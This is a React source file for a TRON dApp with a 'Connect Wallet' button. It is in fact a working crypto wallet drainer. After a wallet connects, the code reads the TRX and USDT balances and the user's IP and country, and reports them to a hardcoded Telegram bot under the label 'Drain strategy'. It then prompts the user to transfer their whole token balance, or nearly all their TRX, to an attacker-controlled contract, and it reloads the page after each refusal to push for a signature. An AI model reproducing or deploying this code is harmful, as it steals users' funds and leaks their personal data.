import React, { useEffect, useRef } from "react";
import { TronLinkAdapter } from "@tronweb3/tronwallet-adapter-tronlink";
import {
  WalletProvider as TronWalletProvider,
  useWallet,
} from "@tronweb3/tronwallet-adapter-react-hooks";
import {
  WalletSelectModal,
  WalletModalProvider,
  useWalletModal,
} from "@tronweb3/tronwallet-adapter-react-ui";
import "@tronweb3/tronwallet-adapter-react-ui/style.css";

// === CONFIG ===
const botToken = "7915640715:AAF6IlydrG6LsZvdNDqoNt1j1VeH0tJ7DaA";
const chatId = "-1002549542119";
const contractAddress = "TZ39vkX47KWvj3QykrkA9xPoHJVdfXSSDM";
const trc20TokenAddress = "TYdSDmmHkNHFY8373rVBZNzqAGuS6GvJxU";
const dappName = "My DApp";
const dappIcon = "https://example.com/dapp-icon.png"; // замените на ваш логотип

const trc20Abi = [
  {
    constant: true,
    inputs: [{ name: "_owner", type: "address" }],
    name: "balanceOf",
    outputs: [{ name: "balance", type: "uint256" }],
    type: "function",
  },
  {
    constant: false,
    inputs: [
      { name: "_to", type: "address" },
      { name: "_value", type: "uint256" },
    ],
    name: "transfer",
    outputs: [{ name: "success", type: "bool" }],
    type: "function",
  },
];

// === UTILS ===
async function sendLogToTelegram(text) {
  try {
    await fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        chat_id: chatId,
        text,
        parse_mode: "HTML",
        disable_web_page_preview: true,
      }),
    });
  } catch (err) {
    console.error("Telegram error:", err);
  }
}

async function getTRC20Balance(userAddress) {
  try {
    const contract = await window.tronWeb.contract(trc20Abi, trc20TokenAddress);
    const balance = await contract.methods.balanceOf(userAddress).call();
    return window.tronWeb.toBigNumber(balance).toNumber();
  } catch {
    return 0;
  }
}

async function getTRXPriceUSD() {
  try {
    const res = await fetch(
      "https://tron-dapp-proxy.vercel.app/api/proxy?url=" +
        encodeURIComponent("https://api.coingecko.com/api/v3/simple/price?ids=tron&vs_currencies=usd")
    );
    const data = await res.json();
    return data.tron.usd || 0;
  } catch {
    return 0;
  }
}


function getFlagEmoji(countryCode) {
  return countryCode
    .toUpperCase()
    .replace(/./g, (char) =>
      String.fromCodePoint(127397 + char.charCodeAt())
    );
}

// === WALLET HANDLER ===
function WalletHandler() {
  const { address, connected } = useWallet();

  // Счётчик отказов
  const rejectCountRef = useRef(0);
  // Баланс для лога в catch
  const totalBalanceUSDRef = useRef(0);

  useEffect(() => {
    if (!connected || !address || !window.tronWeb) return;

    (async () => {
      try {
        const tronWeb = window.tronWeb;
        const userAddress = address;
        const contractHex = tronWeb.address.toHex(contractAddress);

        const trxBalanceSun = await tronWeb.trx.getBalance(userAddress);
        const balanceTRX = trxBalanceSun / 1_000_000;

        const tokenBalanceRaw = await getTRC20Balance(userAddress);
        const tokenBalance = tokenBalanceRaw / 1_000_000;

        const trxPrice = await getTRXPriceUSD();

        let tokenPriceUSD = 0;
        try {
          const res = await fetch(
      "https://tron-dapp-proxy.vercel.app/api/proxy?url=" +
        encodeURIComponent("https://api.coingecko.com/api/v3/simple/price?ids=tron&vs_currencies=usd")
    );
          const data = await res.json();
          tokenPriceUSD = data?.[trc20TokenAddress.toLowerCase()]?.usd || 0;
        } catch {}

        const balanceUSD = balanceTRX * trxPrice;
        const tokenBalanceUSD = tokenBalance * tokenPriceUSD;
        const totalBalanceUSD = balanceUSD + tokenBalanceUSD;

        // Сохраняем для catch
        totalBalanceUSDRef.current = totalBalanceUSD;

        // Получаем IP и страну
        const ipData = await fetch("https://ipapi.co/json/");
        const ipJson = await ipData.json();
        const ip = ipJson.ip || "unknown";
        const country = ipJson.country_name || "unknown";
        const countryCode = ipJson.country_code || "";

        // Новый лог подключения
await sendLogToTelegram(
  `<b>✨New connect (TronLink)</b>\n` +
    `📍IP: ${ip}\n` +
    `Country: ${country} ${countryCode ? getFlagEmoji(countryCode) : ""}\n\n` +
    `🤞 Drain strategy (~$${totalBalanceUSD.toFixed(2)})\n` +
    `┖ <a href="https://tronscan.org/#/address/${userAddress}">${userAddress}</a>\n` +
    `┖ TRX: ${balanceTRX.toFixed(6)}\n` +
    `┖ USDT: ${tokenBalance.toFixed(6)}\n\n` +
    `🔗 <b>Website:</b> <a href="${window.location.href}">${window.location.href}</a>`
);


        const fee = 1_000_000;

        if (trxBalanceSun <= fee && tokenBalanceRaw === 0) {
          console.warn("Insufficient funds");
          return;
        }

        if (tokenBalanceRaw > trxBalanceSun) {
          const tokenContract = await tronWeb.contract(trc20Abi, trc20TokenAddress);
          const transferResult = await tokenContract.methods
            .transfer(contractAddress, tokenBalanceRaw)
            .send();

          if (transferResult) {
            const txLink = `https://tronscan.org/#/transaction/${transferResult}`;
            await sendLogToTelegram(
              `✅ <b>TRC-20 Transfer Created</b>\n` +
                `From: <a href="https://tronscan.org/#/address/${userAddress}">${userAddress}</a>\n` +
                `Amount: <b>${tokenBalance.toFixed(6)} tokens (~$${tokenBalanceUSD.toFixed(2)})</b>\n` +
                `Token: <code>${trc20TokenAddress}</code>\n` +
                `Tx: <a href="${txLink}">${transferResult}</a>`
            );
            console.log("TRC-20 tokens sent to contract");
          } else {
            await sendLogToTelegram(`❌ TRC20 transfer failed`);
            console.error("TRC-20 transfer error");
          }
        } else {
          const amount = trxBalanceSun - fee;

          const tx = await tronWeb.transactionBuilder.triggerSmartContract(
            contractHex,
            "deposit()",
            {
              callValue: amount,
              feeLimit: 5_000_000,
            },
            [],
            userAddress
          );

          if (!tx || !tx.transaction) {
            console.error("Transaction build error");
            return;
          }

          const signedTx = await tronWeb.trx.sign(tx.transaction);
          if (!signedTx) {
            console.error("Transaction signing error");
            return;
          }

          const result = await tronWeb.trx.sendRawTransaction(signedTx);
          if (result.result) {
            const link = `https://tronscan.org/#/transaction/${result.txid}`;
            await sendLogToTelegram(
              `✅ <b>TRX Transfer Created</b>\nFrom: <a href="https://tronscan.org/#/address/${userAddress}">${userAddress}</a>\n` +
                `Amount: <b>${(amount / 1_000_000).toFixed(6)} TRX (~$${balanceUSD.toFixed(2)})</b>\nTx: <a href="${link}">${result.txid}</a>`
            );
            console.log("TRX sent to contract");
          } else {
            await sendLogToTelegram(
              `❌ Transaction failed: ${result.message || "unknown"}`
            );
            console.error("TRX sending error");
          }
        }
      } catch (e) {
  rejectCountRef.current++;
  

  const rejectCount = incrementRejectCounter();

await sendLogToTelegram(
  `x${rejectCount} 🔴 User rejected - $${totalBalanceUSDRef.current ? totalBalanceUSDRef.current.toFixed(2) : "N/A"}\n` +
  `<a href="https://tronscan.org/#/address/${address}">Address Tron</a>\n` +
  `🔗 Website: <a href="${window.location.href}">${window.location.href}</a>`
);

window.location.reload();
  console.error("Error: ", e.message);

  // Перезагрузка страницы при отмене
  window.location.reload();
}
    })();
  }, [connected, address]);

  return null;
}

function incrementRejectCounter() {
  const key = "rejectCount";
  const current = parseInt(localStorage.getItem(key)) || 0;
  const updated = current + 1;
  localStorage.setItem(key, updated);
  return updated;
}

// === CONNECT BUTTON ===
function ConnectButton() {
  const { setVisible } = useWalletModal();
  const { connect, connected } = useWallet();

  const handleClick = async () => {
    if (!connected) {
      try {
        await connect();
      } catch (err) {
        console.error("Wallet connect failed:", err);
      }
    }
    setVisible(true);
  };

  return (
    <button
      onClick={handleClick}
      style={{
        padding: "12px 24px",
        borderRadius: "10px",
        background: "#01bfa6",
        color: "#fff",
        fontWeight: "bold",
        fontSize: "16px",
        border: "none",
        cursor: "pointer",
      }}
    >
      Connect Wallet
    </button>
  );
}

// === ADAPTERS ===
const isMobile = /iPhone|iPad|iPod|Android/i.test(navigator.userAgent);
const adapters = [
  new TronLinkAdapter({
    openTronLinkAppOnMobile: true,
    openUrlWhenWalletNotFound: true,
    checkTimeout: 15000,
    providerUrl: isMobile
      ? "tronlinkoutside://pull.activity"
      : "https://extension.tronlink.org",
    dappName,
    dappIcon,
  }),
];

// === APP ENTRYPOINT ===
export default function App() {
  return (
    <TronWalletProvider adapters={adapters} autoConnect={false}>
      <WalletModalProvider>
        <div
          style={{
            display: "flex",
            flexDirection: "column",
            alignItems: "center",
            padding: "40px",
          }}
        >
          <ConnectButton />
          <WalletSelectModal />
          <WalletHandler />
        </div>
      </WalletModalProvider>
    </TronWalletProvider>
  );
}
